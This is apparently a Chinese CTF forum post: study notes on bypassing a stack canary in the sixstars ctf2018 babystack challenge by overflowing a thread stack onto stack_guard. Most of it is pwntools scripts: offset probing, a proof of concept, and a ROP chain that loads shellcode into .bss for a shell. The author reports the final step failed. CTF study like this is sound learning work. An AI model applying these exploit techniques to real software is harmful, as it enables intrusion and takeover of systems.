-
-
[原创]PWN学习笔记【canary绕过练习】【sixstars ctf2018_babystack】
-
2022-5-30 18:05
-
原理[子线程栈溢出可以覆盖到stack_guard]
先测试子线程的stack_guard和canary偏移量
#!/usr/local/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
sh = gdb.debug('./a.out', "b *readn")
sh.sendlineafter(b"send?\n", str(0x2000).encode("utf-8"))
str = cyclic(0x2000)
sh.send(str[:0x1000])
sh.send(str[0x1000:])
sh.interactive()得到:
stack_guard:6120
canary:4104
构造poc
#!/usr/local/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
sh = gdb.debug('./a.out', "b *readn")
sh.sendlineafter(b"send?\n", str(6136).encode("utf-8"))
str = 'A'*4104 + 'BBBBCCCC' + 'A'*2008 + 'BBBBCCCCDDDDEEEE'
sh.send(str[:0x1000])
sh.send(str[0x1000:])
sh.interactive()成功绕过canary:
exp思路:
read(0,bss,?) 把shellcode读到bss段
然后到bss运行shellcode反弹shell
注:新版本的kali【Linux kali 5.16.0-kali7-amd64】和ubuntu 20.04,bss段没有运行权限?这个问题待解答。
gadget取参数,只有rdi和rsi,没有rdx
构造exp
#!/usr/local/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
sh = gdb.debug('./a.out', "b *readn")
elf = ELF('./a.out')
read_plt = elf.plt['read']
sh.sendlineafter(b"send?\n", str(6136).encode("utf-8"))
shellcode = asm(shellcraft.sh())
print(len(shellcode))
pop_rdi = 0x0000000000400c03# : pop rdi ; ret
pop_rsi_r15 = 0x0000000000400c01# : pop rsi ; pop r15 ; ret
bss_start = 0x602010
paload = b'A'*4104 + b'BBBBCCCC' + b'A'*8
paload += p64(pop_rdi) + p64(0) # pop rdi
paload += p64(pop_rsi_r15) + p64(bss_start) + p64(0xdeadbeef) # pop rsi, r15
paload += p64(read_plt) #read(0, bss_start, ?)
paload += p64(bss_start) #bss_start()
paload += cyclic(1944) + b'BBBBCCCCDDDDEEEE'
print("strlen %d" %len(paload))
sh.send(paload[:0x1000])
sh.send(paload[0x1000:])
sh.send(shellcode)
sh.interactive()bss没有可执行权限。。。。
不会了,学会了再接着搞
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
|
|
|---|---|
